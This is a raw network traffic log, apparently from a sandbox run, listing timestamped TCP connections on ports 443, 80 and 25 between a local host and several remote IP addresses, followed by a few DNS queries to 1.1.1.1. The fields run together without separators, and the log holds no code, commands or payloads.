                                                                                Oct 12, 2023 17:42:17.059043884 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.059065104 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.060327053 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.060400963 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.060924053 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.061119080 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.061125040 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.061340094 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.111823082 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.111835957 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.139039993 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:17.139081001 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:17.139139891 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:17.139856100 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:17.139866114 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:17.160171032 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.186373949 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186424017 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186480999 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.186491013 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186501026 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186547995 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.186597109 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186804056 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.186845064 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.186849117 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187486887 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187539101 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.187546015 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187633991 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187657118 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187671900 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.187678099 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.187711000 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.188347101 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.188599110 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.188642979 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.188647032 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.189342976 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.189388990 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.189407110 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.189410925 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.189445972 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.189475060 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.190258980 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.190304995 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.190308094 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.190422058 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.190458059 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.190462112 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.191142082 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.191184998 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.191189051 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.191286087 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.191323042 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.191327095 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.192302942 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.192348003 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.192351103 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193022013 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193067074 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.193070889 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193161011 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193201065 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.193203926 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193774939 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193818092 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.193821907 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193933964 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193962097 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.193969965 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.193974972 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.194014072 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.194017887 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.194067955 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.194103956 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.195204973 CEST49761443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.195213079 CEST44349761104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431265116 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431351900 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431376934 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431437969 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.431504965 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431557894 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.431560993 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431574106 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.431621075 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.431648016 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.432327032 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.432373047 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.432394028 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.432482004 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.432522058 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.432533979 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.432966948 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.433012962 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.433027983 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.433813095 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.433868885 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.433868885 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.433886051 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.433928013 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.433990955 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.434755087 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.434792042 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.434803009 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.434820890 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.434866905 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.434879065 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.435869932 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.435929060 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.435947895 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436034918 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436078072 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.436091900 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436638117 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436697960 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.436705112 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436716080 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.436764002 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.436779022 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.437712908 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.437746048 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.437773943 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.437788963 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.437839985 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.437853098 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.438807964 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.438893080 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.438898087 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.438922882 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.438973904 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.439481020 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.439625025 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.439665079 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.439676046 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.439683914 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.439724922 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.439728022 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.439766884 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.440177917 CEST49762443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:17.440193892 CEST44349762104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:17.756752968 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:17.757083893 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:17.757110119 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:17.758260012 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:17.758379936 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.136702061 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.136898994 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.136918068 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.178466082 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.184218884 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.184247017 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.238667965 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.439984083 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.439990997 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.440052032 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.441421032 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.441431999 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.482399940 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.534465075 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.534480095 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.548815966 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.548845053 CEST44349764185.93.3.244192.168.2.4
                                                                                Oct 12, 2023 17:42:18.548935890 CEST49764443192.168.2.4185.93.3.244
                                                                                Oct 12, 2023 17:42:18.819734097 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.874773979 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.942936897 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.942961931 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.944230080 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.944284916 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.944355011 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.945466042 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.945528984 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.946825027 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:18.946834087 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:18.990552902 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:19.174812078 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:19.175292969 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:19.175370932 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:19.177164078 CEST49766443192.168.2.4142.250.217.132
                                                                                Oct 12, 2023 17:42:19.177181959 CEST44349766142.250.217.132192.168.2.4
                                                                                Oct 12, 2023 17:42:21.838252068 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:21.838304996 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:21.838371992 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:21.838718891 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:21.838736057 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:22.822261095 CEST2561328150.136.204.204192.168.2.4
                                                                                Oct 12, 2023 17:42:22.822351933 CEST6132825192.168.2.4150.136.204.204
                                                                                Oct 12, 2023 17:42:22.831190109 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:22.877567053 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.316966057 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.317018986 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.318155050 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.318259001 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.342623949 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.342742920 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.343017101 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.343070984 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.393279076 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.667634964 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.667728901 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:23.668211937 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.669588089 CEST49768443192.168.2.488.99.162.33
                                                                                Oct 12, 2023 17:42:23.669631004 CEST4434976888.99.162.33192.168.2.4
                                                                                Oct 12, 2023 17:42:24.432107925 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:24.432182074 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:24.432255983 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:25.817488909 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:25.817543030 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:26.661252022 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:26.661286116 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:26.661356926 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:26.664311886 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:26.664320946 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:27.617665052 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:27.617793083 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:27.622595072 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:27.622612953 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:27.622893095 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:27.662559986 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:27.868324041 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:27.910454988 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.550918102 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.550961971 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.550971031 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.550981045 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551006079 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551099062 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.551121950 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551152945 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.551172972 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.551290035 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551351070 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.551354885 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551377058 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.551414013 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.573599100 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.573625088 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:28.573661089 CEST49769443192.168.2.440.68.123.157
                                                                                Oct 12, 2023 17:42:28.573669910 CEST4434976940.68.123.157192.168.2.4
                                                                                Oct 12, 2023 17:42:33.063905001 CEST2558944150.136.204.204192.168.2.4
                                                                                Oct 12, 2023 17:42:33.064007998 CEST5894425192.168.2.4150.136.204.204
                                                                                Oct 12, 2023 17:42:54.693034887 CEST8049734209.197.3.8192.168.2.4
                                                                                Oct 12, 2023 17:42:54.693212986 CEST4973480192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:42:56.891694069 CEST8049742209.197.3.8192.168.2.4
                                                                                Oct 12, 2023 17:42:56.891932011 CEST4974280192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:42:58.519210100 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:58.519231081 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:58.891194105 CEST49737443192.168.2.423.1.237.66
                                                                                Oct 12, 2023 17:43:05.193365097 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:05.193398952 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:05.193465948 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:05.194511890 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:05.194525003 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.099723101 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.099858046 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.101912975 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.101921082 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.102138996 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.104696989 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.146445990 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.992738008 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.992799997 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.992871046 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.992904902 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.992944002 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993077993 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.993078947 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.993138075 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993175030 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993206978 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.993220091 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993273020 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.993316889 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993436098 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.993484974 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.997198105 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.997230053 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:06.997256994 CEST49771443192.168.2.440.127.169.103
                                                                                Oct 12, 2023 17:43:06.997272968 CEST4434977140.127.169.103192.168.2.4
                                                                                Oct 12, 2023 17:43:13.104269028 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:43:13.104449034 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:43:13.104533911 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:43:13.823937893 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:43:13.823991060 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:43:13.921416998 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:13.921468973 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:13.921555042 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:13.922585964 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:13.922602892 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:14.289691925 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:14.290189981 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:14.290214062 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:14.290693998 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:14.291513920 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:14.291599035 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:14.331728935 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:21.130908966 CEST4972380192.168.2.48.250.197.254
                                                                                Oct 12, 2023 17:43:21.130918026 CEST4973480192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:43:21.130916119 CEST4972480192.168.2.48.250.197.254
                                                                                Oct 12, 2023 17:43:21.130950928 CEST4974280192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:43:21.294158936 CEST8049734209.197.3.8192.168.2.4
                                                                                Oct 12, 2023 17:43:21.294290066 CEST4973480192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:43:21.294668913 CEST8049742209.197.3.8192.168.2.4
                                                                                Oct 12, 2023 17:43:21.294732094 CEST4974280192.168.2.4209.197.3.8
                                                                                Oct 12, 2023 17:43:21.305811882 CEST80497238.250.197.254192.168.2.4
                                                                                Oct 12, 2023 17:43:21.305849075 CEST80497248.250.197.254192.168.2.4
                                                                                Oct 12, 2023 17:43:21.306037903 CEST4972380192.168.2.48.250.197.254
                                                                                Oct 12, 2023 17:43:21.306124926 CEST4972480192.168.2.48.250.197.254
                                                                                Oct 12, 2023 17:43:24.326796055 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:24.326879978 CEST44349773142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:43:24.327020884 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:25.819107056 CEST49773443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:43:25.819174051 CEST44349773142.250.188.228192.168.2.4
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 12, 2023 17:42:09.707952023 CEST5543253192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:09.708233118 CEST5090553192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:09.708664894 CEST5287653192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:09.708945990 CEST5652853192.168.2.41.1.1.1
                                                                                Oct 12, 2023 17:42:09.865627050 CEST53527611.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:09.870333910 CEST53554321.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:09.870362043 CEST53509051.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:09.870592117 CEST53528761.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:09.871077061 CEST53565281.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:10.854630947 CEST53557661.1.1.1192.168.2.4
                                                                                Oct 12, 2023 17:42:11.119692087 CEST5923453192.168.2.41.1.1.1
